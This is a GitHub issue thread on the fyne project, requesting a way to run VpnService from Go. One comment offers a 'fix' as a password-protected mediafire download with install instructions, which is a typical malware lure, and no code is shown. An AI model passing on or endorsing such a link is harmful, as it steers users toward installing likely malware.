### ISSUE TITLE
Vpn Service

### ISSUE THREAD

**Issue by Smart781** [fyne-io/fyne#5103]
### Checklist

- [X] I have searched the [issue tracker](https://github.com/fyne-io/fyne/issues) for open issues that relate to the same feature, before opening a new one.
- [X] This issue only relates to a single feature. I will open new issues for any other features.

### Is your feature request related to a problem?

There are problems with launching VPN Service on Go.

### Describe the solution you'd like to see.

The function that runs VpnService on Go

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by andydotxyz** [comment]
Duplicate of #5083
